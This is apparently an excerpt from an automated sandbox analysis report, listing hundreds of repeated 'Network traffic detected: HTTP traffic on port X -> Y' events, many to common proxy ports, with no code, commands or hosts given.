                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 34633
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 8090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 8881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 49042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 26305
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34633 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8881 -> 49901
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 35891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 10008
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 10051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 9401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 13286
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 8060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 10102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35891 -> 50219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50322 -> 55555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 87
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 26592
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50480 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50508 -> 4833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10008 -> 50222
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 50284
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50483 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 24360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 38088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 10001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50448
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 50168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 3880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 61553
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 36580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50603 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 37920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50627 -> 8192
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 58330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 9990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 19600
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50422
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8060 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50762 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50753 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50927 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 50582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50875 -> 1082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50839 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50473
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50895 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 22785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50988 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50549
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50983 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50921 -> 14888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 14076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 29796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 49547
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 6666
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51005 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50995 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50958 -> 5088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 6030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50970 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 50920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 23128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 10102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50955 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50550
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 59040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50989 -> 9123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50976 -> 9050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 49093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 50711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50963 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 40975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50990 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50573
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 36580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 47851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50455 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51006 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 7779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51052 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51055 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51068 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 50875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51075 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51086 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51085 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 55029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14888 -> 50921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 59045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 50677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 61553
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 23128 -> 50938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51109 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50338 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51058 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8088 -> 50955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51133 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9050 -> 50976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50267
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 50909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 32930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47851 -> 51024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 19600
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 22785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50451 -> 22167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51149 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51086
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51092 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 4154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 9050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51143 -> 32588
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50479 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51280 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51288 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 62244
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51330 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 32100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 32708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51203 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50447 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51354 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51207 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51204 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51271 -> 10007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 30000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 43520
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51234 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 29796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 5566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50541 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51259 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51389 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50839 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 50935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51339 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 26592
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 32650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50531 -> 6005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50692 -> 57495
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51430 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51361 -> 10011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51346 -> 31673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50633 -> 6011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51382 -> 42072
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51411 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51532 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 16691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 49093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
